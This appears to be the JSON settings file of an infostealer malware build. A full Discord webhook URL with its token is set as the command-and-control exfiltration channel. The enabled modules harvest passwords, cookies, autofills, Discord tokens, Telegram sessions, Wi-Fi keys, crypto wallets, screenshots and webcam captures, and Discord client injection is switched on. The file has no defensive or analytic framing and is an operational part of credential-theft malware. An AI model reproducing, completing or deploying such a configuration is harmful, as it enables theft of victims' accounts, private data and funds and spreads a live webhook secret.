{
    "settings": {
        "c2": [
            0,
            "https://discord.com/api/webhooks/1370615324038398052/ZizwmWDSmz4WUM1TrH6LnSt1u1AVDh-_FfIAHGnJNgvGCsq1YinRjN2U-Jly43z6TEYP"
        ],
        "mutex": "c6ulXvHheMlIuMvi",
        "pingme": false,
        "vmprotect": false,
        "startup": false,
        "melt": false,
        "uacBypass": false,
        "archivePassword": "3344",
        "consoleMode": 0,
        "debug": false,
        "pumpedStubSize": 0,
        "boundFileRunOnStartup": true
    },
    "modules": {
        "captureWebcam": true,
        "capturePasswords": true,
        "captureCookies": true,
        "captureHistory": true,
        "captureAutofills": true,
        "captureDiscordTokens": true,
        "captureGames": true,
        "captureWifiPasswords": true,
        "captureSystemInfo": true,
        "captureScreenshot": true,
        "captureTelegramSession": true,
        "captureCommonFiles": true,
        "captureWallets": true,
        "fakeError": [
            false,
            [
                "",
                "",
                0
            ]
        ],
        "blockAvSites": false,
        "discordInjection": true
    }
}